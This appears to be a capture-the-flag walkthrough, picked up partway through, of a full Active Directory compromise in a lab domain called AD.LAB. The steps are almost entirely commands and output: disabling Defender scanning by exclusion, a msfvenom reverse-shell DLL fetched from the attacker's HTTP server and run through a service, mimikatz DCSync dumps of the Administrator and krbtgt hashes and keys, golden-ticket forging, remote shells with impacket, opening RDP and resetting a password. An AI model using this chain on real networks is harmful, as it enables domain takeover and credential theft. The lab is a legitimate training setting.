Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Windows\System32> Add-MpPreference -ExclusionPath "C:\NewService"
Add-MpPreference -ExclusionPath "C:\NewService"
4. Created a reverse shell binary
┌──(kali㉿kali)-[~]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.10 LPORT=4452 -f dll > payload4452.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: /home/kali/payload4452.dll
5. Confirmed the Python3 HTTP Server is still Running
┌──(kali㉿kali)-[~]
└─$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...6. Downloaded “NewService.dll” from Kali and saved it as “NewService.dll” in “C:\NewService”.
C:\Windows\System32> curl http://10.10.14.10:8000/payload4452.dll -o C:\NewService\NewService.dll
curl http://10.10.14.10:8000/payload4452.dll -o C:\NewService\NewService.dll
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 9216 100 9216 0 0 2133k 0 --:--:-- --:--:-- --:--:-- 3000k
7. Started “NewService” service on ADMIN01 to trigger the reverse shell.
C:\Windows\System32> sc.exe \\ADMIN01 start NewService
sc.exe \\ADMIN01 start NewService
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.
8. Spawned Reverse Shell as Jamie
┌──(kali㉿kali)-[~]
└─$ nc -nvlp 4452
listening on [any] 4452 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.14.180] 49806
Microsoft Windows [Version 10.0.26100.3194]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\System32>whoami
ad\jamie
C:\Windows\System32> hostname
hostname
ADMIN01
9. Confirmed Jamie is a Domain Admin.
C:\Windows\System32> whoami /groups
whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
AD\Domain Admins Group S-1-5-21-3014030118-327537043-3250143841-512 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
AD\Denied RODC Password Replication Group Alias S-1-5-21-3014030118-327537043-3250143841-572 Mandatory group, Enabled by default, Enabled group, Local Group
Mandatory Label\High Mandatory Level Label S-1-16-1228810. Added a Windows Defender Exclusion for the current directory.
C:\Windows\System32> powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Windows\System32> Add-MpPreference -ExclusionPath "C:\Windows\System32"
Add-MpPreference -ExclusionPath "C:\Windows\System32"
11. Prepared mimikatz.exe for download
┌──(kali㉿kali)-[~]
└─$ find / -name mimikatz.exe -type f 2>/dev/null
/usr/share/windows-resources/mimikatz/x64/mimikatz.exe
/usr/share/windows-resources/mimikatz/Win32/mimikatz.exe
┌──(kali㉿kali)-[~]
└─$ cp /usr/share/windows-resources/mimikatz/x64/mimikatz.exe .
12. Downloaded mimikatz.exe
PS C:\Windows\System32> wget http://10.10.14.10:8000/mimikatz.exe -O mimikatz.exe13. Launched Mimikatz and Debugged Privileges.
PS C:\Windows\System32> .\mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz # privilege::debug
Privilege '20' OK14. Performed a DC Sync Attack Against the Domain “Administrator” Account
mimikatz # lsadump::dcsync /user:Administrator
[DC] 'AD.LAB' will be the domain
[DC] 'DC01.AD.LAB' will be the DC server
[DC] 'Administrator' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 1/24/2025 1:48:42 PM
Object Security ID : S-1-5-21-3014030118-327537043-3250143841-500
Object Relative ID : 500
Credentials:
Hash NTLM: 8842797845cabde1d8f43062d448ef49
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 4bcf99c0d5c2e92a7696c9807d6c3cf3
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos-Newer-Keys *
Default Salt : WIN-H251RJ5K3LCAdministrator
Default Iterations : 4096
Credentials
des_cbc_md5_nt (4096) : b475f37e339ab5ec04f1b0c2d491fd8d1b92e0871e7bceedd230b5fd871f7aee
unknow (4096) : 5b9c1bd7ddd120f56b2600b72c4e117a
aes256_hmac (4096) : 0caf9f9cb9b2050ff19b05d666d2740f265fcddb3a48e2776884b4774c95e505
aes128_hmac (4096) : dad66760c5d23adc4ac24a210eeb038e
rc4_hmac_nt (4096) : 8842797845cabde1d8f43062d448ef49
ServiceCredentials
des_cbc_md5_nt (4096) : b475f37e339ab5ec04f1b0c2d491fd8d1b92e0871e7bceedd230b5fd871f7aee
unknow (4096) : 5b9c1bd7ddd120f56b2600b72c4e117a
aes256_hmac (4096) : 0caf9f9cb9b2050ff19b05d666d2740f265fcddb3a48e2776884b4774c95e505
aes128_hmac (4096) : dad66760c5d23adc4ac24a210eeb038e
15. Performed a DC Sync Attack Against the Domain’s Kerberos Ticket Granting Ticket (TGT) Account
mimikatz # lsadump::dcsync /user:krbtgt
[DC] 'AD.LAB' will be the domain
[DC] 'DC01.AD.LAB' will be the DC server
[DC] 'krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : krbtgt
** SAM ACCOUNT **
SAM Username : krbtgt
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 1/24/2025 4:32:04 PM
Object Security ID : S-1-5-21-3014030118-327537043-3250143841-502
Object Relative ID : 502
Credentials:
Hash NTLM: 8ede040cc3cbd7649a7ab4e697d06af1
ntlm- 0: 8ede040cc3cbd7649a7ab4e697d06af1
lm - 0: 5c794f5fabe33b29bd7f5357b5fcd22b
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 12fcc2dd860252616a608023ed83a2f4
* Primary:Kerberos-Newer-Keys *
Default Salt : AD.LABkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : c87ee26d98cd7e5619ee2f4f112825d2f2eaf820f6f7207ccb7580f26f525bf3
aes128_hmac (4096) : 82059b064cf9e37442dd551a0a63478e
rc4_hmac_nt (4096) : 8ede040cc3cbd7649a7ab4e697d06af1
ServiceCredentials
aes256_hmac (4096) : c87ee26d98cd7e5619ee2f4f112825d2f2eaf820f6f7207ccb7580f26f525bf3
aes128_hmac (4096) : 82059b064cf9e37442dd551a0a63478e
* Packages *
NTLM-Strong-NTOWF
* Primary:WDigest *
01 87cac500530835ff5072e5c2f3406578
02 733ebafc9d4c215b3c345c73e3ad6c59
03 270c47a3092a428602bbce8fcf1de09b
04 87cac500530835ff5072e5c2f3406578
05 733ebafc9d4c215b3c345c73e3ad6c59
06 4ba17dd1d43fed0a98252ef4a5f91350
07 87cac500530835ff5072e5c2f3406578
08 173ce291e04e5ea682bcaa932da84c91
09 599e30f14c68418ff425f3468d0be1d7
10 0acb693f56033050549c3cd8874c7ad7
11 173ce291e04e5ea682bcaa932da84c91
12 599e30f14c68418ff425f3468d0be1d7
13 cf11a723677dfaa69687227f2d84fc08
14 173ce291e04e5ea682bcaa932da84c91
15 c1f1fa0aaca8630124909784bb45c88f
16 05a95f5c31e436bc03edc1d0ac95ad28
17 bdb51e14cd66dc7074d80b6fb069aab9
18 9f964c8788760262665ddf17a3c67ef0
19 362415ec7d0a79ebeb8e01494077a204
20 550d12e039a30907e5b7328514df5600
21 8c7ee19d5565fb65c7b4ecb357535ca8
22 8c7ee19d5565fb65c7b4ecb357535ca8
23 77c1d633cc8dac2970ef3145fb8060b5
24 ece6246c819d3465a2ef0244ae8d77fd
25 b57822e9da5bfa37e1ca58555e30237b
26 be8a4f29399954b631dcc98d7bd9732d
27 ac0cc2b556264053a0939a1868b1462c
28 ace73220c3d371e1fd77b51857e0f430
29 ea27e480a0bda6cb1f44309107004e191. Copied getTGT.py to the current working directory
┌──(kali㉿kali)-[~]
└─$ sudo updatedb
┌──(kali㉿kali)-[~]
└─$ locate getTGT.py
/usr/lib/python3/dist-packages/minikerberos/examples/getTGT.py
/usr/share/doc/python3-impacket/examples/getTGT.py
┌──(kali㉿kali)-[~]
└─$ cp /usr/share/doc/python3-impacket/examples/getTGT.py .
2. Used the Domain “Administrator” account’s AES256 Key to request a Kerberos TGT for the administrator account:
┌──(kali㉿kali)-[~]
└─$ python3 getTGT.py -aesKey 0caf9f9cb9b2050ff19b05d666d2740f265fcddb3a48e2776884b4774c95e505 ad.lab/administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in administrator.ccache3. Set the Kerberos Cache Environmental Variable.
┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME=administrator.ccache4. Verified the Kerberos Ticket Cache
┌──(kali㉿kali)-[~]
└─$ klist
Ticket cache: FILE:administrator.ccache
Default principal: administrator@AD.LAB
Valid starting Expires Service principal
02/08/2025 23:28:37 02/09/2025 09:28:37 krbtgt/AD.LAB@AD.LAB
renew until 02/09/2025 23:28:395. Launched a semi-interactive remote WMI command shell as Administrator on the domain controller:
┌──(kali㉿kali)-[~]
└─$ impacket-wmiexec -k -no-pass -dc-ip 10.10.14.1 -target-ip 10.10.14.1 dc01.ad.lab
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands6. Modified the registry to enable Remote Desktop by setting the fDenyTSConnections value to 0.
C:\> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
The operation completed successfully.7. Created a new firewall rule to allow inbound TCP traffic on port 3389, which is used by RDP.
C:\> netsh advfirewall firewall add rule name="Allow RDP Inbound" dir=in action=allow protocol=TCP localport=3389
Ok.8. Listed active network connections and listeners filtered by port 3389 to verify that the RDP service is listening.
C:\> netstat -ano | findstr 3389
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 2892
TCP [::]:3389 [::]:0 LISTENING 2892
UDP 0.0.0.0:3389 *:* 2892
UDP [::]:3389 *:* 2892
UDP [::]:53389 *:* 31809. Reset Jamie's Password
C:\> net user Jamie NewPassword123
The command completed successfully.
10. Connected to the Domain Controller via RDP as a Domain Admin (Jamie)
┌──(kali㉿kali)-[~]
└─$ xfreerdp3 /cert:ignore /compression /auto-reconnect /u:Jamie /p:NewPassword123 /v:10.10.14.1
[23:51:18:013] [210738:210739] [INFO][com.freerdp.gdi] - Local framebuffer format PIXEL_FORMAT_BGRX32
[23:51:18:013] [210738:210739] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_BGRA32
[23:51:18:049] [210738:210739] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd
[23:51:18:049] [210738:210739] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel rdpgfx
[23:51:18:330] [210738:210739] [INFO][com.freerdp.client.x11] - Logon Error Info LOGON_FAILED_OTHER [LOGON_MSG_SESSION_CONTINUE]
[23:51:20:695] [210738:210739] [WARN][com.freerdp.core.rdp] - pduType PDU_TYPE_DATA not properly parsed, 562 bytes remaining unhandled. Skipping.1. Purged the existing Kerberos ticket cache
┌──(kali㉿kali)-[~]
└─$ kdestroy2. Copied ticketer.py to the current working directory
┌──(kali㉿kali)-[~]
└─$ locate ticketer.py
/usr/lib/python3/dist-packages/scapy/modules/ticketer.py
/usr/share/doc/python3-impacket/examples/ticketer.py
┌──(kali㉿kali)-[~]
└─$ cp /usr/share/doc/python3-impacket/examples/ticketer.py .
3. Used the AES Key for the Kerberos Ticket Granting Ticket (TGT) account to create a Golden Ticket for the ad.lab Domain:
┌──(kali㉿kali)-[~]
└─$ ./ticketer.py -aesKey c87ee26d98cd7e5619ee2f4f112825d2f2eaf820f6f7207ccb7580f26f525bf3 -domain-sid S-1-5-21-3014030118-327537043-3250143841 -domain ad.lab Administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Creating basic skeleton ticket and PAC Infos
/home/kali/./ticketer.py:141: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
aTime = timegm(datetime.datetime.utcnow().timetuple())
[*] Customizing ticket for ad.lab/Administrator
/home/kali/./ticketer.py:600: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
ticketDuration = datetime.datetime.utcnow() + datetime.timedelta(hours=int(self.__options.duration))
/home/kali/./ticketer.py:718: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
encTicketPart['authtime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
/home/kali/./ticketer.py:719: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
encTicketPart['starttime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
/home/kali/./ticketer.py:843: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
encRepPart['last-req'][0]['lr-value'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
[*] EncAsRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncASRepPart
[*] Saving ticket in Administrator.ccache4. Set the Kerberos Cache Environmental Variable.
┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME=Administrator.ccache5. Verified the Kerberos Ticket Cache
┌──(kali㉿kali)-[~]
└─$ klist
Ticket cache: FILE:Administrator.ccache
Default principal: Administrator@AD.LAB
Valid starting Expires Service principal
02/08/2025 23:53:40 02/06/2035 23:53:40 krbtgt/AD.LAB@AD.LAB
renew until 02/06/2035 23:53:406. Used the Cached Kerberos Ticket to Enumerate SMB Shares:
┌──(kali㉿kali)-[~]
└─$ nxc smb files01.ad.lab --use-kcache --shares --kdcHost dc01.ad.lab
SMB files01.ad.lab 445 FILES01 [*] Windows 10.0 Build 26100 x64 (name:FILES01) (domain:AD.LAB) (signing:True) (SMBv1:False)
SMB files01.ad.lab 445 FILES01 [+] AD.LAB\administrator from ccache (Pwn3d!)
SMB files01.ad.lab 445 FILES01 [*] Enumerated shares
SMB files01.ad.lab 445 FILES01 Share Permissions Remark
SMB files01.ad.lab 445 FILES01 ----- ----------- ------
SMB files01.ad.lab 445 FILES01 ADMIN$ READ,WRITE Remote Admin
SMB files01.ad.lab 445 FILES01 C$ READ,WRITE Default share
SMB files01.ad.lab 445 FILES01 DomainAdminsShare READ
SMB files01.ad.lab 445 FILES01 IPC$ READ Remote IPC7. Opened a semi-interactive remote SMB Exec command shell as SYSTEM on FILES01.
┌──(kali㉿kali)-[~]
└─$ impacket-smbexec -k -no-pass -dc-ip 10.10.14.1 -target-ip 10.10.14.200 files01.ad.lab
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\System32> whoami
nt authority\system8. Configured the WMI service (winmgmt) to start automatically on the remote system.
C:\Windows\System32> sc config winmgmt start= auto
[SC] ChangeServiceConfig SUCCESS9. Attempted to start the WMI service.
C:\Windows\System32> net start winmgmt
The requested service has already been started.
More help is available by typing NET HELPMSG 2182.10. Enabled WMI in the Windows Firewall Rules.
C:\Windows\System32> netsh advfirewall firewall set rule group="Windows Management Instrumentation (WMI)" new enable=yes
Updated 8 rule(s).
Ok.11. Exited the SMBEXEC remote shell session
C:\Windows\System32> exit12. Launched a WMI command shell and confirm membership to the Domain Admins group
┌──(kali㉿kali)-[~]
└─$ impacket-wmiexec -k -no-pass -dc-ip 10.10.14.1 -target-ip 10.10.14.200 files01.ad.lab
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\> whoami
ad.lab\administrator
C:\> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================= ================ ============================================ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
AD\Domain Admins Group S-1-5-21-3014030118-327537043-3250143841-512 Mandatory group, Enabled by default, Enabled group
AD\Group Policy Creator Owners Group S-1-5-21-3014030118-327537043-3250143841-520 Mandatory group, Enabled by default, Enabled group
AD\Schema Admins Group S-1-5-21-3014030118-327537043-3250143841-518 Mandatory group, Enabled by default, Enabled group
AD\Enterprise Admins Group S-1-5-21-3014030118-327537043-3250143841-519 Mandatory group, Enabled by default, Enabled group
AD\Denied RODC Password Replication Group Alias S-1-5-21-3014030118-327537043-3250143841-572 Mandatory group, Enabled by default, Enabled group, Local Group
Mandatory Label\High Mandatory Level Label S-1-16-1228813. Read the flag.txt file
C:\> type C:\DomainAdminsShare\flag.txt
H@6K3RS3C101TheKing!@#$© 2025 Andrew Lobenstein. All Rights Reserved.